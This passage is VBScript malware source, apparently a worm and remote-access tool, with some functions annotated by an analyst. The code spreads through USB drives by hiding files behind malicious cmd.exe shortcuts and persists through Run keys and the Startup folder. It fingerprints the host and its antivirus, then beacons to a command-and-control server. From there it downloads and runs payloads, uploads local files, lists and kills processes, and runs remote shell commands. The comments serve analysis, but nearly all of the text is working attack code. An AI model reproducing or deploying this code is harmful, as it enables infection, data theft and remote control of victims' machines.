- filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4
- end if
- for each file in filesystemobj.getfolder( drive.path & "\" ).Files
- if not lnkfile then exit for
- if instr (file.name,".") then
- if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
- file.attributes = 2+4
- if ucase (file.name) <> ucase (installname) then
- filename = split(file.name,".")
- set lnkobj = shellobj.createshortcut (drive.path & "\" & filename (0) & ".lnk")
- lnkobj.windowstyle = 7
- lnkobj.targetpath = "cmd.exe"
- lnkobj.workingdirectory = ""
- lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
- fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
- if instr (fileicon,",") = 0 then
- lnkobj.iconlocation = file.path
- else
- lnkobj.iconlocation = fileicon
- end if
- lnkobj.save()
- end if
- end if
- end if
- next
- for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
- if not lnkfolder then exit for
- folder.attributes = 2+4
- foldername = folder.name
- set lnkobj = shellobj.createshortcut (drive.path & "\" & foldername & ".lnk")
- lnkobj.windowstyle = 7
- lnkobj.targetpath = "cmd.exe"
- lnkobj.workingdirectory = ""
- lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
- foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
- if instr (foldericon,",") = 0 then
- lnkobj.iconlocation = folder.path
- else
- lnkobj.iconlocation = foldericon
- end if
- lnkobj.save()
- next
- end If
- end If
- end if
- next
- err.clear
- end sub
- sub uninstall
- on error resume next
- dim filename
- dim foldername
- shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
- shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
- filesystemobj.deletefile startup & installname ,true
- filesystemobj.deletefile wscript.scriptfullname ,true
- for each drive in filesystemobj.drives
- if drive.isready = true then
- if drive.freespace > 0 then
- if drive.drivetype = 1 then
- for each file in filesystemobj.getfolder ( drive.path & "\").files
- on error resume next
- if instr (file.name,".") then
- if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
- file.attributes = 0
- if ucase (file.name) <> ucase (installname) then
- filename = split(file.name,".")
- filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
- else
- filesystemobj.deletefile (drive.path & "\" & file.name)
- end If
- else
- filesystemobj.deletefile (file.path)
- end if
- end if
- next
- for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
- folder.attributes = 0
- next
- end if
- end if
- end if
- next
- wscript.quit
- end sub
- function post (cmd ,param)
- post = param
- httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
- httpobj.setrequestheader "user-agent:",information
- httpobj.send param
- post = httpobj.responsetext
- end function
- ' information: builds (once) and returns the host-fingerprint / beacon string sent to the C2.
- ' Fields, joined by the global separator "spliter", in order:
- '   volume serial (hwid), %COMPUTERNAME%, %USERNAME%, OS caption (Win32_OperatingSystem),
- '   the literal tag "plus", installed AV names (security), and the usbspreading flag.
- ' The result is cached in the global "inf"; later calls return the cached value unchanged.
- function information
- on error resume next
- if inf = "" then
- inf = hwid & spliter
- inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter
- inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter
- set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- set os = root.execquery ("select * from win32_operatingsystem")
- ' Only the first OS instance is used.
- for each osinfo in os
- inf = inf & osinfo.caption & spliter
- exit for
- next
- ' "plus" is a fixed marker - likely a variant/version tag; its meaning is not visible here.
- inf = inf & "plus" & spliter
- inf = inf & security & spliter
- inf = inf & usbspreading
- information = inf
- else
- information = inf
- end if
- end function
- ' upstart: establishes persistence. Writes a Run-key value (name = installname without
- ' extension) under both HKCU and HKLM that relaunches the installed copy with
- ' "wscript.exe //B" (batch mode: no script error dialogs), and copies the running script to
- ' installdir and to the Startup folder, overwriting any existing file.
- ' The HKLM write only succeeds with elevated rights; the error is silently ignored.
- ' Globals used: shellobj, filesystemobj, installdir, installname, startup.
- sub upstart ()
- on error resume Next
- shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
- shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
- filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
- filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
- end sub
- ' hwid: victim identifier. Returns the VolumeSerialNumber of the first Win32_LogicalDisk
- ' that reports a non-empty serial (enumeration order is whatever WMI returns).
- ' Returns an empty value if no disk has a serial or the WMI query fails (errors are suppressed).
- function hwid
- on error resume next
- set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- set disks = root.execquery ("select * from win32_logicaldisk")
- for each disk in disks
- if disk.volumeserialnumber <> "" then
- hwid = disk.volumeserialnumber
- exit for
- end if
- next
- end function
- ' security: enumerates installed antivirus products for the beacon. Picks the WMI namespace
- ' root\SecurityCenter2 (Vista and later) or root\SecurityCenter (older) based on the OS
- ' version number, queries AntiVirusProduct and concatenates the display names, each
- ' followed by " .". Returns "nan-av" when nothing is found.
- ' NOTE(review): the version parsing below is buggy and only survives because of
- ' On Error Resume Next - see the inline comments. Left as-is; this is an analysis listing.
- function security
- on error resume next
- security = ""
- set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
- for each objitem in colitems
- versionstr = split (objitem.version,".")
- next
- ' Bug: ".version" is read from the collection, not an item; the error is swallowed and
- ' versionstr keeps the value from the loop above.
- versionstr = split (colitems.version,".")
- osversion = versionstr (0) & "."
- ' Bug: the loop variable is x but versionstr(i) is indexed with the never-assigned "i",
- ' so the minor digits are never appended; osversion ends up as "<major>.".
- for x = 1 to ubound (versionstr)
- osversion = osversion & versionstr (i)
- next
- ' eval turns the string into a number so the comparison below is numeric.
- osversion = eval (osversion)
- if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
- set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
- Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
- for each objantivirus in colantivirus
- security = security & objantivirus.displayname & " ."
- next
- if security = "" then security = "nan-av"
- end function
- ' instance: start-up / single-instance logic.
- '  1. Reads HKLM\software\<installname-without-ext>\ (default value) into the global
- '     usbspreading. If empty, records "true - <date>" when the script is running from a
- '     drive root (path "X:\<installname>", i.e. launched from a removable-media copy) or
- '     "false - <date>" otherwise, and persists that string in the same key.
- '  2. Calls upstart to install persistence.
- '  3. If this script file is not the installed copy (short paths differ), launches the
- '     installed copy via "wscript.exe //B" and quits, so only the installed copy keeps running.
- '  4. Opens the installed file for append (mode 8); if that fails the script quits.
- '     This appears to act as a single-instance lock - a second instance cannot open the
- '     file the first one holds - but that intent is inferred, not stated in the code.
- ' Globals used: shellobj, filesystemobj, installdir, installname, usbspreading.
- function instance
- on error resume next
- usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
- if usbspreading = "" then
- ' Strip the drive letter; a root-level path "X:\name" becomes ":\name".
- if lcase ( mid(wscript.scriptfullname,2)) = ":\" & lcase(installname) then
- usbspreading = "true - " & date
- shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
- else
- usbspreading = "false - " & date
- shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
- end if
- end If
- upstart
- set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname)
- set installfullnameshort = filesystemobj.getfile (installdir & installname)
- ' Compare 8.3 short paths so differences in case/long-name form do not matter.
- if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
- shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
- wscript.quit
- end If
- err.clear
- ' The handle in oneonce is intentionally never closed.
- set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
- if err.number > 0 then wscript.quit
- end function
- ' sitedownloader: download-and-execute from an arbitrary URL. Fetches fileurl with a
- ' synchronous XMLHTTP GET, saves the raw body to <installdir><filename> (deleting any
- ' existing file first), and runs the saved file if it exists. No integrity or type check
- ' is performed on the payload. No error handler: failures in the GET/stream propagate.
- ' Globals used: installdir, shellobj.
- sub sitedownloader (fileurl,filename)
- strlink = fileurl
- strsaveto = installdir & filename
- set objhttpdownload = createobject("msxml2.xmlhttp" )
- objhttpdownload.open "get", strlink, false
- objhttpdownload.send
- set objfsodownload = createobject ("scripting.filesystemobject")
- if objfsodownload.fileexists (strsaveto) then
- objfsodownload.deletefile (strsaveto)
- end if
- ' Only write the file on HTTP 200; type 1 = binary stream.
- if objhttpdownload.status = 200 then
- dim objstreamdownload
- set objstreamdownload = createobject("adodb.stream")
- with objstreamdownload
- .type = 1
- .open
- .write objhttpdownload.responsebody
- .savetofile strsaveto
- .close
- end with
- set objstreamdownload = nothing
- end if
- ' Execute whatever landed on disk, via its 8.3 short path.
- if objfsodownload.fileexists(strsaveto) then
- shellobj.run objfsodownload.getfile (strsaveto).shortpath
- end if
- end sub
- ' download: C2-to-victim file transfer plus execution. POSTs to
- ' http://<host>:<port>/is-sending<spliter><fileurl> with an empty body; the response body
- ' is the file content, which is written to <filedir><basename of fileurl> and then run.
- ' fileurl is split on "\" (not "/"), so it is a path on the operator's side rather than a URL.
- ' filedir defaults to installdir when empty. No error handler; failures propagate.
- ' Globals used: host, port, spliter, installdir, shellobj.
- sub download (fileurl,filedir)
- if filedir = "" then
- filedir = installdir
- end if
- strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
- set objhttpdownload = createobject("msxml2.xmlhttp")
- objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
- objhttpdownload.send ""
- set objfsodownload = createobject ("scripting.filesystemobject")
- if objfsodownload.fileexists (strsaveto) then
- objfsodownload.deletefile (strsaveto)
- end if
- ' Only write the file on HTTP 200; type 1 = binary stream.
- if objhttpdownload.status = 200 then
- dim objstreamdownload
- set objstreamdownload = createobject("adodb.stream")
- with objstreamdownload
- .type = 1
- .open
- .write objhttpdownload.responsebody
- .savetofile strsaveto
- .close
- end with
- set objstreamdownload = nothing
- end if
- ' Execute the dropped file via its 8.3 short path.
- if objfsodownload.fileexists(strsaveto) then
- shellobj.run objfsodownload.getfile (strsaveto).shortpath
- end if
- end sub
- ' upload: victim-to-C2 file exfiltration. Reads the local file at fileurl as a binary
- ' ADODB stream and POSTs its bytes to http://<host>:<port>/is-recving<spliter><fileurl>.
- ' Uses a function-local httpobj (the Dim shadows the global of the same name).
- ' Returns nothing; no error handler, so a missing file raises to the caller.
- ' Globals used: host, port, spliter.
- function upload (fileurl)
- dim httpobj,objstreamuploade,buffer
- set objstreamuploade = createobject("adodb.stream")
- with objstreamuploade
- .type = 1
- .open
- .loadfromfile fileurl
- buffer = .read
- .close
- end with
- ' Note: releases objstreamdownload (undeclared here), not objstreamuploade - a harmless slip.
- set objstreamdownload = nothing
- set httpobj = createobject("msxml2.xmlhttp")
- httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
- httpobj.send buffer
- end function
- ' enumdriver: drive listing for the C2. Returns one "<path>|<drivetype>" entry per ready
- ' drive, each terminated by the global separator spliter. Drives that are not ready are omitted.
- ' Globals used: filesystemobj, spliter.
- function enumdriver ()
- for each drive in filesystemobj.drives
- if drive.isready = true then
- enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
- end if
- next
- end Function
- ' enumfaf: directory listing for the C2. Output starts with enumdir itself, then one
- ' "<name>|<size>|<d or f>|<attributes>" record per entry, each terminated by spliter.
- ' Subfolders come first (size left empty, kind "d"), then files (kind "f").
- ' No error handler: an inaccessible enumdir raises to the caller.
- ' Globals used: filesystemobj, spliter.
- function enumfaf (enumdir)
- enumfaf = enumdir & spliter
- for each folder in filesystemobj.getfolder (enumdir).subfolders
- enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
- next
- for each file in filesystemobj.getfolder (enumdir).files
- enumfaf = enumfaf & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & spliter
- next
- end function
- ' enumprocess: process listing for the C2 via WMI Win32_Process. Returns one
- ' "<name>|<pid>|<executablepath>" record per process, each terminated by spliter.
- ' Errors (e.g. an unreadable ExecutablePath) are suppressed, leaving that field empty.
- ' Globals used: spliter.
- function enumprocess ()
- on error resume next
- set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
- set colitems = objwmiservice.execquery("select * from win32_process",,48)
- dim objitem
- for each objitem in colitems
- enumprocess = enumprocess & objitem.name & "|"
- enumprocess = enumprocess & objitem.processid & "|"
- enumprocess = enumprocess & objitem.executablepath & spliter
- next
- end function
- ' exitprocess: kills a process tree. Runs "taskkill /F /T /PID <pid>" with window style 7
- ' (minimized, no focus) and waits for it to finish. pid is interpolated into the command
- ' line unvalidated; errors are suppressed.
- ' Globals used: shellobj.
- sub exitprocess (pid)
- on error resume next
- shellobj.run "taskkill /F /T /PID " & pid,7,true
- end sub
- ' deletefaf: deletes the path given in url, trying it first as a file and then as a
- ' folder; whichever call does not apply fails silently under On Error Resume Next.
- ' Globals used: filesystemobj.
- sub deletefaf (url)
- on error resume next
- filesystemobj.deletefile url
- filesystemobj.deletefolder url
- end sub
- ' cmdshell: remote command execution. Runs cmd through "%comspec% /c" and returns the
- ' command's stdout in full; only if stdout is empty does it return stderr instead.
- ' Both streams are never combined, so a command that writes to both loses its stderr.
- ' The local "httpobj" is declared but unused. No error handler.
- ' Globals used: shellobj.
- function cmdshell (cmd)
- dim httpobj,oexec,readallfromany
- set oexec = shellobj.exec ("%comspec% /c " & cmd)
- if not oexec.stdout.atendofstream then
- readallfromany = oexec.stdout.readall
- elseif not oexec.stderr.atendofstream then
- readallfromany = oexec.stderr.readall
- else
- readallfromany = ""
- end if
- cmdshell = readallfromany
- end function